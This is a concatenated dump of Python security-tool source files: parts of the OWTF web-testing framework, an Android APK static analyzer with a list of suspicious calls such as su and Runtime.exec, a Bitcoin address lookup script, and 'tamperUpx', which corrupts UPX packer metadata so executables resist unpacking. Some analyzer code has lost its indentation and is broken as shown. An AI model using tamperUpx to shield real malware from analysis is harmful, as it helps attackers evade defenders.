        :type command: `str`
        :return: the spawned process
        :rtype: `subprocess.Popen`
        """
        # Add proxy settings to environment variables so that tools can pick it up proxification, because these
        # variables are set for every command that is run
        # http://stackoverflow.com/questions/4789837/how-to-terminate-a-python-subprocess-launched-with-shell-true/4791612#4791612)
        proc = subprocess.Popen(
            command,
            shell=True,
            env=self.shell_env,
            preexec_fn=os.setsid,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            bufsize=1,
        )
        return proc

    def shell_exec_monitor(self, session, command, plugin_info):
        """Monitor shell command execution

        :param command: Command to run
        :type command: `str`
        :param plugin_info: Plugin context info
        :type plugin_info: `dict`
        :return: Scrubbed output from the command
        :rtype: `str`
        """
        cmd_info = self.start_cmd(command, command)
        target, can_run = self.can_run_cmd(session=session, command=cmd_info)
        if not can_run:
            message = "The command was already run for target: {!s}".format(target)
            return message
        logging.info("")
        logging.info("Executing :\n\n%s\n\n", command)
        logging.info(
            "------> Execution Start Date/Time: %s",
            self.timer.get_start_date_time_as_str("Command"),
        )
        logging.info("")
        output = ""
        cancelled = False
        proc = None
        try:
            proc = self.create_subprocess(command)
            while True:
                line = proc.stdout.readline()
                if not line:
                    break
                logging.info(
                    line.decode("utf-8").strip()
                )  # Show progress on the screen too!
                output += line.decode(
                    "utf-8"
                )  # Save as much output as possible before a tool crashes! :)
        except KeyboardInterrupt:
            os.killpg(proc.pid, signal.SIGINT)
            out, err = proc.communicate()
            # logging.warn is deprecated; warning() is the supported spelling.
            logging.warning(out.decode("utf-8"))
            output += out.decode("utf-8")
            try:
                os.killpg(
                    os.getpgid(proc.pid), signal.SIGTERM
                )  # Plugin KIA (Killed in Action)
            except OSError:
                pass  # Plugin RIP (Rested In Peace)
            cancelled = True
            output += user_abort("Command", output)  # Identify as Command Level abort
        finally:
            try:
                self.finish_cmd(
                    session=session,
                    cmd_info=cmd_info,
                    was_cancelled=cancelled,
                    plugin_info=plugin_info,
                )
            except SQLAlchemyError as e:
                logging.error(
                    "Exception occurred while during database transaction : \n%s",
                    str(e),
                )
                output += str(e)
        return scrub_output(output)

    def shell_exec(self, command, **kwargs):
        """This is mostly used for internal framework commands

        .. note::
            # Stolen from (added shell=True tweak, necessary for easy piping straight via the command line, etc):
            # http://stackoverflow.com/questions/236737/making-a-system-call-that-returns-the-stdout-output-as-a-string/
            # 236909#236909

        :param command: Command to run
        :type command: `str`
        :param kwargs: Misc. args
        :type kwds: `dict`
        :return: the command's stdout (stderr is merged into it)
        :rtype: `bytes`
        """
        kwargs.setdefault("stdout", subprocess.PIPE)
        kwargs.setdefault("stderr", subprocess.STDOUT)
        p = subprocess.Popen(command, shell=True, **kwargs)
        return p.communicate()[0]


# Module-level singleton used throughout the framework.
shell = BaseShell()
| 33.909091 | 131 | 0.572529 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Michael Spreitzenbarth (research@spreitzenbarth.de)
# Copyright (C) 2015 Daniel Arp (darp@gwdg.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re, urllib
from os.path import basename
from urlparse import urlparse
import numpy as np
from misc import get_file_hash
from xml.dom.minidom import parseString
from androguard.core.bytecodes import apk, dvm
from androguard.core.analysis.analysis import VMAnalysis
class StaticAPKAnalyzer():
# performs static analysis on given apk file
def __init__(self, output_format=None):
self._apk_data = dict()
self._a = None
self._d = None
self._dx = None
self._cm = None
self._strings = None
# set output parameters
categories = ['files',
'features',
'intent_filters',
'activities',
'req_permissions',
'used_permissions',
'api_calls',
'crypto_calls',
'net_calls',
'telephony_calls',
'suspicious_calls',
'dynamic_calls',
'native_calls',
'reflection_calls',
'urls',
'providers',
'receivers',
'services',
'libraries']
self._out = {'format': output_format,
'feat_len': 80,
'categories': categories}
    def analyze(self, apk_file):
        """Run the full static pipeline on `apk_file`: reset previous results,
        load the apk with androguard, then extract every feature category."""
        self._apk_data = dict()
        self.__init_androguard_objects(apk_file)
        self.__extract_features(apk_file)
def set_max_output_feat_len(self, feat_len):
# set maximal length of feature strings
self._out['feat_len'] = feat_len
def set_output_categories(self, categories):
# specify feature categories that should be printed, by default, all extracted features are written to output.
self._out['categories'] = categories
    def __init_androguard_objects(self, apk_file):
        """Load the apk with androguard and build the analysis helpers."""
        self._a = apk.APK(apk_file)
        self._d = dvm.DalvikVMFormat(self._a.get_dex())  # parsed classes.dex
        self._dx = VMAnalysis(self._d)  # dataflow / tainted-package analysis
        self._cm = self._d.get_class_manager()
        self._strings = self._d.get_strings()
    def __extract_features(self, apk_file):
        """Populate self._apk_data with every feature category."""
        self.__calc_hashes(apk_file)
        self.__extract_apk_obj_features()

        # extract features from vm analysis object
        used_perms_dict = self._dx.get_permissions([])
        self._apk_data['used_permissions'] = used_perms_dict.keys()
        # Every code path guarded by a permission contributes API calls.
        for paths in used_perms_dict.values():
            self.__extract_dx_features('api_calls', paths)
        paths = self._dx.tainted_packages.search_crypto_packages()
        self.__extract_dx_features('crypto_calls', paths)
        paths = self._dx.tainted_packages.search_net_packages()
        self.__extract_dx_features('net_calls', paths)
        paths = self._dx.tainted_packages.search_telephony_packages()
        self.__extract_dx_features('telephony_calls', paths)
        # Dynamic code loading and reflection usage are common malware markers.
        paths = self._dx.get_tainted_packages().search_methods("Ldalvik/system/DexClassLoader;", ".", ".")
        self.__extract_dx_features('dynamic_calls', paths)
        paths = self._dx.get_tainted_packages().search_methods("Ljava/lang/reflect/Method;", ".", ".")
        self.__extract_dx_features('reflection_calls', paths)
        self.__extract_native_calls()
        self.__extract_urls()
        self.__extract_suspicious_calls()
def __calc_hashes(self, apk_file):
self._apk_data['md5'] = get_file_hash('md5', apk_file)
self._apk_data['sha256'] = get_file_hash('sha256', apk_file)
def __extract_apk_obj_features(self):
self._apk_data['apk_name'] = str(basename(self._a.get_filename()))
self._apk_data['package_name'] = str(self._a.get_package())
self._apk_data['sdk_version'] = str(self._a.get_min_sdk_version())
self._apk_data['features'] = self._a.get_elements('uses-feature', 'android:name')
self._apk_data['files'] = self._a.get_files()
self._apk_data['activities'] = self._a.get_activities()
self._apk_data['providers'] = self._a.get_providers()
self._apk_data['req_permissions'] = self._a.get_permissions()
self._apk_data['receivers'] = self._a.get_receivers()
self._apk_data['services'] = self._a.get_services()
self._apk_data['libraries'] = self._a.get_libraries()
self._apk_data['intent_filters'] = self._a.get_elements('action', 'android:name') + self._a.get_elements('category', 'android:name')
def __extract_dx_features(self, category, paths):
self._apk_data[category] = dict()
for path in paths:
class_name = path.get_dst(self._cm)[0]
method_name = path.get_dst(self._cm)[1]
if method_name.find('init') > 0:
method_name = 'init'
method_name = class_name[1:] + '->' + method_name
self._apk_data[category][method_name] = 1
    def __extract_native_calls(self):
        """Record every DEX method declared with the native access flag."""
        self._apk_data['native_calls'] = dict()
        for method in self._d.get_methods():
            # this condition is copied from show_NativeCalls()
            # 0x100 is the ACC_NATIVE bit of the DEX access-flag encoding
            if method.get_access_flags() & 0x100:
                class_name = method.get_class_name()
                method_name = method.get_name()
                # collapse constructor variants into a single 'init' token
                if method_name.find('init') > 0:
                    method_name = 'init'
                method_name = class_name[1:] + '->' + method_name
                self._apk_data['native_calls'][method_name] = 1
def __extract_urls(self):
# get urls
ip_regex = '(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|\
(?:%[0-9a-fA-F][0-9a-fA-F]))+'
self._apk_data['urls'] = dict()
for string in self._strings:
# search for ip addresses
ip = re.search(ip_regex, string)
if None != ip:
ip = ip.group()
self._apk_data['urls'][ip] = 1
# search for urls
url = re.search(url_regex, string)
if None != url:
url = urllib.quote(url.group(), '>:/?')
self._apk_data['urls'][url] = 1
# add hostname
o = urlparse(url)
hostname = o.netloc
self._apk_data['urls'][hostname] = 1
def __extract_suspicious_calls(self):
sus_calls = ['Ljava/net/HttpURLconnection;->setRequestMethod',
'Ljava/net/HttpURLconnection',
'getExternalStorageDirectory',
'getSimCountryIso',
'execHttpRequest',
'sendTextMessage',
'Lorg/apache/http/client/methods/HttpPost',
'getSubscriberId',
'Landroid/telephony/SmsMessage;->getMessageBody',
'getDeviceId',
'getPackageInfo',
'getSystemService',
'getWifiState',
'system/bin/su',
'system/xbin/su',
'setWifiEnabled',
'setWifiDisabled',
'Cipher',
'Ljava/io/IOException;->printStackTrace',
'android/os/Exec',
'Ljava/lang/Runtime;->exec']
sus_calls = dict(zip(sus_calls, np.ones(len(sus_calls))))
self._apk_data['suspicious_calls'] = dict()
for string in self._strings:
for sc in sus_calls:
if string.find(sc) >= 0:
self._apk_data['suspicious_calls'][string] = 1
sus_tuples = [('java/net/HttpURLconnection', 'setRequestMethod'),
('android/telephony/SmsMessage', 'getMessageBody'),
('java/io/IOException', 'printStackTrace'),
('java/lang/Runtime', 'exec')]
for tpl in sus_tuples:
class_name = tpl[0][1:]
name = tpl[1]
paths = self._dx.tainted_packages.search_methods(class_name, name, '')
for path in paths:
method = path.get_dst(self._cm)
method_full = method[0] + '->' + method[1]
self._apk_data['suspicious_calls'][method_full] = 1
def __str__(self):
if self._out['format'] == 'xml':
out_str = self.__create_xml_string()
else:
out_str = self.__get_feature_strings()
return out_str
def __get_feature_strings(self):
feat_str = ''
for category in self._out['categories']:
if category not in self._apk_data:
continue
for item in self._apk_data[category]:
feat_str += '\n{0}::{1}'\
.format(category, item[:self._out['feat_len']])
return feat_str[1:]
    def __create_xml_string(self):
        """Serialize all configured feature categories as a <static> XML document.

        The parseString() round-trip validates that the hand-built markup is
        well-formed before returning it.
        NOTE(review): unlike __get_feature_strings, missing categories are not
        skipped here, so a configured-but-unextracted category raises KeyError
        in __get_category_string -- confirm intended.
        """
        xml_str = '<static>'
        xml_str += self.__get_info_string()
        for category in self._out['categories']:
            xml_str += self.__get_category_string(category)
        xml_str += '\n</static>'
        doc = parseString("" + xml_str + "")
        xml = doc.toxml().replace('<static>', '\n<static>')
        return xml
def __get_info_string(self):
istr = '\n\t<info>'
istr += '\n\t\t<sha256>' + str(self._apk_data['sha256']) + '</sha256>'
istr += '\n\t\t<md5>' + str(self._apk_data['md5']) + '</md5>'
istr += '\n\t\t<apk_name>' + self._apk_data['apk_name'] + '</apk_name>'
istr += '\n\t\t<package_name>' + self._apk_data['package_name'] + '</package_name>'
istr += '\n\t\t<sdk_version>' + self._apk_data['sdk_version'] + '</sdk_version>'
istr += '\n\t</info>'
return istr
def __get_category_string(self, category):
cat_str = '\n\t<{}>'.format(category)
for item in self._apk_data[category]:
field = self.__get_field_name(category)
cat_str += '\n\t\t<{0}>{1}</{0}>'\
.format(field, item[:self._out['feat_len']])
cat_str += '\n\t</{}>'.format(category)
return cat_str
@staticmethod
def __get_field_name(category):
if category.endswith('ies'):
return category[:-3] + 'y'
else:
return category[:-1] | 36.797297 | 140 | 0.533655 |
cybersecurity-penetration-testing | import argparse
import csv
import json
import logging
import sys
import os
import urllib2
import unix_converter as unix
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20150920'
__version__ = 0.03
__description__ = 'This scripts downloads address transactions using blockchain.info public APIs'
def main(address, output_dir):
    """
    The main function handles coordinating logic
    :param address: The Bitcoin Address to lookup
    :param output_dir: The output CSV file path to write the results to
    :return: Nothing
    """
    logging.info('Initiated program for {} address'.format(address))
    logging.info('Obtaining JSON structured data from blockchain.info')
    raw_account = getAddress(address)
    # getAddress() returns a urllib2 response object; decode its JSON payload
    account = json.loads(raw_account.read())
    printHeader(account)
    parseTransactions(account, output_dir)
def getAddress(address):
    """
    The getAddress function uses the blockchain.info Data API to pull
    down account information and transactions for the address of interest
    :param address: The Bitcoin Address to lookup
    :return: The response of the url request; on URLError the error is
        logged and the whole program exits with status 1
    """
    url = 'https://blockchain.info/address/{}?format=json'.format(address)
    try:
        return urllib2.urlopen(url)
    except urllib2.URLError, e:
        logging.error('URL Error for {}'.format(url))
        # HTTP-level errors additionally carry a status code and headers
        if hasattr(e, 'code') and hasattr(e, 'headers'):
            logging.debug('{}: {}'.format(e.code, e.reason))
            logging.debug('{}'.format(e.headers))
        print 'Received URL Error for {}'.format(url)
        logging.info('Program exiting...')
        sys.exit(1)
def parseTransactions(account, output_dir):
    """
    The parseTransactions function appends transaction data into a
    nested list structure so it can be successfully used by the csvWriter function.
    :param account: The JSON decoded account and transaction data
    :param output_dir: The output CSV file path to write the results to
    :return: Nothing
    """
    msg = 'Parsing transactions...'
    logging.info(msg)
    print msg
    transactions = []
    for i, tx in enumerate(account['txs']):
        transaction = []
        outputs = {}
        inputs = getInputs(tx)
        transaction.append(i)
        transaction.append(unix.unixConverter(tx['time']))
        transaction.append(tx['hash'])
        transaction.append(inputs)
        for output in tx['out']:
            # values are reported in satoshi; scale by 1e-8 to get BTC.
            # NOTE(review): repeated output addresses within one transaction
            # overwrite each other in this dict -- confirm that is acceptable.
            outputs[output['addr']] = output['value'] * 10**-8
        transaction.append('\n'.join(outputs.keys()))
        transaction.append('\n'.join(str(v) for v in outputs.values()))
        transaction.append('{:.8f}'.format(sum(outputs.values())))
        transactions.append(transaction)
    csvWriter(transactions, output_dir)
def printHeader(account):
    """
    The printHeader function prints overall header information
    containing basic address information.
    :param account: The JSON decoded account and transaction data
    :return: Nothing
    """
    print 'Address:', account['address']
    # balances are reported in satoshi; scale by 1e-8 to display BTC
    print 'Current Balance: {:.8f} BTC'.format(account['final_balance'] * 10**-8)
    print 'Total Sent: {:.8f} BTC'.format(account['total_sent'] * 10**-8)
    print 'Total Received: {:.8f} BTC'.format(account['total_received'] * 10**-8)
    print 'Number of Transactions:', account['n_tx']
    # separator line of '=' characters, 22 wide
    print '{:=^22}\n'.format('')
def getInputs(tx):
    """
    The getInputs function is a small helper function that returns
    input addresses for a given transaction
    :param tx: A single instance of a Bitcoin transaction
    :return: a newline-delimited string of the transaction's input addresses
        (empty string when there are none)
    """
    inputs = [input_addr['prev_out']['addr'] for input_addr in tx['inputs']]
    # '\n'.join handles the empty, single- and multi-address cases uniformly,
    # so the original len()-based branching was unnecessary.
    return '\n'.join(inputs)
def csvWriter(data, output_dir):
    """
    The csvWriter function writes transaction data into a CSV file
    :param data: The parsed transaction data in nested list
    :param output_dir: The output CSV file path to write the results to
    :return: Nothing; the process exits (0 on success, 1 on write error)
    """
    logging.info('Writing output to {}'.format(output_dir))
    print 'Writing output.'
    headers = ['Index', 'Date', 'Transaction Hash', 'Inputs', 'Outputs', 'Values', 'Total']
    try:
        # 'wb' is the correct csv mode on Python 2 (avoids blank rows on Windows)
        with open(output_dir, 'wb') as csvfile:
            writer = csv.writer(csvfile)
            writer.writerow(headers)
            for transaction in data:
                writer.writerow(transaction)
            # NOTE(review): flush()/close() are redundant inside the ``with``
            # block, which already closes the file on exit.
            csvfile.flush()
            csvfile.close()
    except IOError, e:
        logging.error('Error writing output to {}.\nGenerated message: {}.'.format(e.filename, e.strerror))
        print 'Error writing to CSV file. Please check output argument {}'.format(e.filename)
        logging.info('Program exiting.')
        sys.exit(1)
    logging.info('Program exiting.')
    print 'Program exiting.'
    sys.exit(0)
if __name__ == '__main__':
    # Run this code if the script is run from the command line.
    # NOTE(review): ArgumentParser(version=...) is Python 2 argparse only;
    # Python 3 requires an explicit add_argument('--version', action='version').
    parser = argparse.ArgumentParser(description='BTC Address Lookup', version=str(__version__),
                                     epilog='Developed by ' + __author__ + ' on ' + __date__)
    parser.add_argument('ADDR', help='Bitcoin Address')
    parser.add_argument('OUTPUT', help='Output CSV file')
    parser.add_argument('-l', help='Specify log directory. Defaults to current working directory.')
    args = parser.parse_args()
    # Set up Log
    if args.l:
        if not os.path.exists(args.l):
            os.makedirs(args.l)  # create log directory path
        log_path = os.path.join(args.l, 'btc_addr_lookup.log')
    else:
        log_path = 'btc_addr_lookup.log'
    # filemode='w' truncates any previous log on each run
    logging.basicConfig(filename=log_path, level=logging.DEBUG,
                        format='%(asctime)s | %(levelname)s | %(message)s', filemode='w')
    logging.info('Starting Bitcoin Address Lookup v.' + str(__version__))
    logging.debug('System ' + sys.platform)
    logging.debug('Version ' + sys.version)
    # Print Script Information
    print '{:=^22}'.format('')
    print '{} {}'.format('Bitcoin Address Lookup, ', __version__)
    print '{:=^22} \n'.format('')
    # Run main program
    main(args.ADDR, args.OUTPUT)
| 35.391813 | 107 | 0.641434 |
owtf | """
This plugin does not perform ANY test: The aim is to visit all URLs grabbed so far and build
the transaction log to feed data to other plugins
NOTE: This is an active plugin because it may visit URLs retrieved by vulnerability scanner spiders
which may be considered sensitive or include vulnerability probing
"""
import logging
from owtf.requester.base import requester
from owtf.managers.url import get_urls_to_visit
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Visit URLs found by other tools, some could be sensitive: need permission"
def run(PluginInfo):
    """Visit every URL recorded for the target so other plugins get transaction data.

    :param PluginInfo: standard OWTF plugin descriptor (unused here)
    :return: HTML string reporting how many URLs were visited
    """
    urls = get_urls_to_visit()
    for url in urls:  # This will return only unvisited urls
        requester.get_transaction(True, url)  # Use cache if possible
    Content = "{} URLs were visited".format(str(len(urls)))
    logging.info(Content)
    return plugin_helper.HtmlString(Content)
| 37.130435 | 99 | 0.762557 |
cybersecurity-penetration-testing | #!/usr/bin/python3
import pefile
import string
import os, sys
def tamperUpx(outfile):
    """Corrupt the UPX metadata of a packed PE so ``upx -d`` cannot restore it.

    Renames UPX* sections, wipes the 'UPX!' magic and the version banner, and
    zeroes the PackHeader fields that the unpacker validates.
    :param outfile: path to the PE file, modified in place
    :return: True if UPX artefacts were found and corrupted, False otherwise
    """
    pe = pefile.PE(outfile)
    # innocent-looking replacement names for UPX0/UPX1/...
    newSectionNames = (
        '.text',
        '.data',
        '.rdata',
        '.idata',
        '.pdata',
    )
    num = 0
    sectnum = 0
    # section table begins right after the optional header; entries are 0x28 bytes
    section_table_offset = (pe.DOS_HEADER.e_lfanew + 4 +
        pe.FILE_HEADER.sizeof() + pe.FILE_HEADER.SizeOfOptionalHeader)
    found = 0
    print('Step 1. Renaming UPX sections...')
    for sect in pe.sections:
        section_offset = section_table_offset + sectnum * 0x28
        sectnum += 1
        if sect.Name.decode().lower().startswith('upx'):
            found += 1
            # section names are fixed 8-byte fields, so NUL-pad the new name
            newname = newSectionNames[num].encode() + ((8 - len(newSectionNames[num])) * b'\x00')
            print('\tRenamed UPX section ({}) => ({})'.format(
                sect.Name.decode(), newSectionNames[num]
            ))
            num += 1
            pe.set_bytes_at_offset(section_offset, newname)
    print('\nStep 2. Removing obvious indicators...')
    pos = pe.__data__.find(b'UPX!')
    if pos != -1:
        found += 1
        print('\tRemoved "UPX!" (UPX_MAGIC_LE32) magic value...')
        pe.set_bytes_at_offset(pos, b'\x00' * 4)
        # the 4 bytes just before the magic usually hold a printable banner
        prev = pe.__data__[pos-5:pos-1]
        if all(chr(c) in string.printable for c in prev):
            print('\tRemoved "{}" indicator...'.format(prev.decode()))
            pe.set_bytes_at_offset(pos-5, b'\x00' * 4)
    # NOTE(review): Step 3 below keeps using ``pos`` even when the magic was
    # not found (pos == -1), so it then reads/writes bytes near the end of
    # the file -- confirm whether it should be gated on pos != -1.
    print('\nStep 3. Corrupting PackHeader...')
    version = pe.__data__[pos + 4]
    _format = pe.__data__[pos + 5]
    method = pe.__data__[pos + 6]
    level = pe.__data__[pos + 7]
    print('\tOverwriting metadata (version={}, format={}, method={}, level={})...'.format(
        version, _format, method, level
    ))
    pe.set_bytes_at_offset(pos + 4, b'\x00')
    pe.set_bytes_at_offset(pos + 5, b'\x00')
    pe.set_bytes_at_offset(pos + 6, b'\x00')
    pe.set_bytes_at_offset(pos + 7, b'\x00')
    #
    # Src:
    # https://github.com/upx/upx/blob/36670251fdbbf72f6ce165148875d369cae8f415/src/packhead.cpp#L187
    # https://github.com/upx/upx/blob/36670251fdbbf72f6ce165148875d369cae8f415/src/stub/src/include/header.S#L33
    #
    u_adler = pe.get_dword_from_data(pe.__data__, pos + 8)
    c_adler = pe.get_dword_from_data(pe.__data__, pos + 12)
    u_len = pe.get_dword_from_data(pe.__data__, pos + 16)
    c_len = pe.get_dword_from_data(pe.__data__, pos + 20)
    origsize = pe.get_dword_from_data(pe.__data__, pos + 24)
    filter_id = pe.__data__[pos + 28]
    filter_cto = pe.__data__[pos + 29]
    unused = pe.__data__[pos + 30]
    header_chksum = pe.__data__[pos + 31]
    print('\tCorrupting stored lengths and sizes:')
    print('\t\t- uncompressed_adler (u_adler): ({} / 0x{:x}) => (0)'.format(u_adler, u_adler))
    pe.set_dword_at_offset(pos + 8, 0)
    print('\t\t- compressed_adler (c_adler): ({} / 0x{:x}) => (0)'.format(c_adler, c_adler))
    pe.set_dword_at_offset(pos + 12, 0)
    print('\t\t- uncompressed_len (u_len): ({} / 0x{:x}) => (0)'.format(u_len, u_len))
    pe.set_dword_at_offset(pos + 16, 0)
    print('\t\t- compressed_len (c_len): ({} / 0x{:x}) => (0)'.format(c_len, c_len))
    pe.set_dword_at_offset(pos + 20, 0)
    print('\t\t- original file size: ({} / 0x{:x}) => (0)'.format(origsize, origsize))
    pe.set_dword_at_offset(pos + 24, 0)
    print('\t\t- filter id: ({} / 0x{:x}) => (0)'.format(filter_id, filter_id))
    pe.set_bytes_at_offset(pos + 28, b'\x00')
    print('\t\t- filter cto: ({} / 0x{:x}) => (0)'.format(filter_cto, filter_cto))
    pe.set_bytes_at_offset(pos + 29, b'\x00')
    print('\t\t- unused: ({} / 0x{:x}) => (0)'.format(unused, unused))
    pe.set_bytes_at_offset(pos + 30, b'\x00')
    print('\t\t- header checksum: ({} / 0x{:x}) => (0)'.format(header_chksum, header_chksum))
    pe.set_bytes_at_offset(pos + 31, b'\x00')
    if found > 0:
        pe.parse_sections(section_table_offset)
        pe.write(outfile)
        print('\n[+] UPX-protected executable corrupted: ' + outfile)
        return True
    else:
        print('\n[-] Input file does not resemble UPX packed executable (or it was already corrupted)')
        return False
def main(argv):
    """CLI entry point: validate arguments, optionally copy the input PE to an
    output path, then corrupt the copy's UPX metadata via tamperUpx().

    :param argv: sys.argv-style list; argv[1] = input PE, optional argv[2] = output path
    :return: 1 on usage/validation error, otherwise None
    """
    print('''
:: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored.
Mariusz Banach / mgeeky, '21
''')
    if len(argv) < 2:
        print('Usage: ./tamperUpx.py <infile> [outfile]')
        # Bug fix: the original fell through here and crashed with an
        # IndexError on argv[1]; bail out with an error status instead.
        return 1
    infile = argv[1]
    outfile = ''
    if len(argv) >= 3:
        outfile = argv[2]
    if not os.path.isfile(infile):
        print('[!] Input file does not exist.')
        return 1
    if len(outfile) > 0:
        # copy the input to the requested output path, then tamper the copy
        with open(outfile, 'wb') as f:
            with open(infile, 'rb') as g:
                f.write(g.read())
    else:
        # no output path given: tamper the input file in place
        outfile = infile
    if tamperUpx(outfile):
        print('[+] Success. UPX should have some issues decompressing output artifact now.')
if __name__ == '__main__':
    # Script entry point: forward the raw argv list to main().
    main(sys.argv)
owtf | """
owtf.api.routes
~~~~~~~~~~~~~~~
"""
import tornado.web
from owtf.api.handlers.config import ConfigurationHandler
from owtf.api.handlers.health import HealthCheckHandler
from owtf.api.handlers.index import IndexHandler
from owtf.api.handlers.misc import ErrorDataHandler, DashboardPanelHandler, ProgressBarHandler
from owtf.api.handlers.plugin import PluginDataHandler, PluginNameOutput, PluginOutputHandler
from owtf.api.handlers.base import FileRedirectHandler
from owtf.api.handlers.report import ReportExportHandler
from owtf.api.handlers.session import OWTFSessionHandler
from owtf.api.handlers.targets import TargetConfigHandler, TargetConfigSearchHandler, TargetSeverityChartHandler
from owtf.api.handlers.transactions import (
TransactionDataHandler,
TransactionHrtHandler,
TransactionSearchHandler,
URLDataHandler,
URLSearchHandler,
)
from owtf.api.handlers.work import WorkerHandler, WorklistHandler, WorklistSearchHandler
from owtf.api.handlers.auth import (
LogInHandler,
LogOutHandler,
RegisterHandler,
AccountActivationGenerateHandler,
AccountActivationValidateHandler,
OtpGenerateHandler,
OtpVerifyHandler,
PasswordChangeHandler,
)
from owtf.api.handlers.api_token import ApiTokenGenerateHandler
from owtf.db.session import get_scoped_session
from owtf.models.plugin import Plugin
from owtf.settings import STATIC_ROOT
__all__ = ["API_v1_HANDLERS", "UI_HANDLERS"]
session = get_scoped_session()
plugin_group_re = "(%s)?" % "|".join(Plugin.get_all_plugin_groups(session))
plugin_type_re = "(%s)?" % "|".join(Plugin.get_all_plugin_types(session))
plugin_code_re = "([0-9A-Z\-]+)?"
API_v1_HANDLERS = [
tornado.web.url(r"/api/v1/errors/?([0-9]+)?/?$", ErrorDataHandler, name="errors_api_url"),
tornado.web.url(
r"/api/v1/sessions/?([0-9]+)?/?(activate|add|remove)?/?$", OWTFSessionHandler, name="owtf_sessions_api_url"
),
tornado.web.url(
r"/api/v1/plugins/?" + plugin_group_re + "/?" + plugin_type_re + "/?" + plugin_code_re + "/?$",
PluginDataHandler,
name="plugins_api_url",
),
tornado.web.url(r"/api/v1/plugins/progress/?$", ProgressBarHandler, name="poutput_count"),
tornado.web.url(r"/api/v1/targets/severitychart/?$", TargetSeverityChartHandler, name="targets_severity"),
tornado.web.url(r"/api/v1/targets/search/?$", TargetConfigSearchHandler, name="targets_search_api_url"),
tornado.web.url(r"/api/v1/targets/?([0-9]+)?/?$", TargetConfigHandler, name="targets_api_url"),
tornado.web.url(r"/api/v1/targets/([0-9]+)/urls/?$", URLDataHandler, name="urls_api_url"),
tornado.web.url(r"/api/v1/targets/([0-9]+)/urls/search/?$", URLSearchHandler, name="urls_search_api_url"),
tornado.web.url(
r"/api/v1/targets/([0-9]+)/transactions/?([0-9]+)?/?$", TransactionDataHandler, name="transactions_api_url"
),
tornado.web.url(
r"/api/v1/targets/([0-9]+)/transactions/search/?$", TransactionSearchHandler, name="transactions_search_api_url"
),
tornado.web.url(
r"/api/v1/targets/([0-9]+)/transactions/hrt/?([0-9]+)?/?$",
TransactionHrtHandler,
name="transactions_hrt_api_url",
),
tornado.web.url(
r"/api/v1/targets/([0-9]+)/poutput/?" + plugin_group_re + "/?" + plugin_type_re + "/?" + plugin_code_re + "/?$",
PluginOutputHandler,
name="poutput_api_url",
),
tornado.web.url(r"/api/v1/targets/([0-9]+)/poutput/names/?$", PluginNameOutput, name="plugin_name_api_url"),
tornado.web.url(r"/api/v1/targets/([0-9]+)/export/?$", ReportExportHandler, name="report_export_api_url"),
# The following one url is dummy and actually processed in file server
tornado.web.url(r"/api/v1/workers/?([0-9]+)?/?(abort|pause|resume)?/?$", WorkerHandler, name="workers_api_url"),
tornado.web.url(
r"/api/v1/worklist/?([0-9]+)?/?(pause|resume|delete)?/?$", WorklistHandler, name="worklist_api_url"
),
tornado.web.url(r"/api/v1/worklist/search/?$", WorklistSearchHandler, name="worklist_search_api_url"),
tornado.web.url(r"/api/v1/configuration/?$", ConfigurationHandler, name="configuration_api_url"),
tornado.web.url(r"/api/v1/dashboard/severitypanel/?$", DashboardPanelHandler),
tornado.web.url(r"/api/v1/register/?$", RegisterHandler, name="regisration_api_url"),
tornado.web.url(r"/api/v1/login/?$", LogInHandler, name="login_api_url"),
tornado.web.url(r"/api/v1/logout/?$", LogOutHandler, name="logout_api_url"),
tornado.web.url(r"/api/v1/generate/api_token/?$", ApiTokenGenerateHandler, name="apitokengenerator_api_url"),
tornado.web.url(
r"/api/v1/generate/confirm_email/?$", AccountActivationGenerateHandler, name="confirmpasswordgenerator_api_url"
),
tornado.web.url(
r"/api/v1/verify/confirm_email/([^/]+)?$",
AccountActivationValidateHandler,
name="confirmpasswordverify_api_url",
),
tornado.web.url(r"/api/v1/generate/otp/?$", OtpGenerateHandler, name="otp_generate_api_url"),
tornado.web.url(r"/api/v1/verify/otp/?$", OtpVerifyHandler, name="otp_verify_api_url"),
tornado.web.url(r"/api/v1/new-password/?$", PasswordChangeHandler, name="password_change_api_url"),
]
UI_HANDLERS = [
tornado.web.url(r"/static/(.*)", tornado.web.StaticFileHandler, {"path": STATIC_ROOT}),
tornado.web.url(r"/debug/health/?$", HealthCheckHandler),
tornado.web.url(r"/output_files/(.*)", FileRedirectHandler, name="file_redirect_url"),
tornado.web.url(r"^/(?!api|debug|static|output_files)(.*)$", IndexHandler),
]
| 48.633929 | 120 | 0.691796 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Return a placeholder HTML string for the manual-testing helper plugin."""
    return plugin_helper.HtmlString("Intended to show helpful info in the future")
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
import volatility.plugins.linux.dalvik as dalvik
import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes
